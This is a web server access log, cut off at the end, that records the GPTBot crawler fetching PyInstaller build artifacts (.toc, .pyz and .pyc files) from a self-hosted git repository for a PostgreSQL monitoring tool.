AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13791] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20141] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14940] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20141] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10951] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20140] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13824] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10952] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:56:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:56:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73593] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10177] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10176] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10177] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23482] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599825] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23482] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23481] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15707] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599821] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 15737] [Gzip 9.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14975] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23449] [Gzip 19.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14291] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14995] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14956] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10951] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13824] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13824] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 6417] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10954] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14262] [Gzip 8.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 